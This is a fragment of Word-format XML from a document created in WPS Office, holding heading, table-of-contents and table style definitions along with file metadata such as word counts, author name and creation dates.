  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="2F5496"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="1F3763"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 4"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cstheme="minorBidi"/>
      <w:b/>
      <w:sz w:val="22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nhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="10">
    <w:name w:val="Table Grid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4197</Words>
  <Characters>7384</Characters>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8862</CharactersWithSpaces>
  <Application>WPS Office_12.8.2.18205_F1E327BC-269C-435d-A152-05C5408002CA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2026-03-19T12:46:00Z</dcterms:created>
  <dc:creator>block</dc:creator>
  <cp:lastModifiedBy>block</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-20T04:20:23Z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B9BECCF16F134588872E951419AFC77A_12</vt:lpwstr>
  </property>
</Properties>
</file>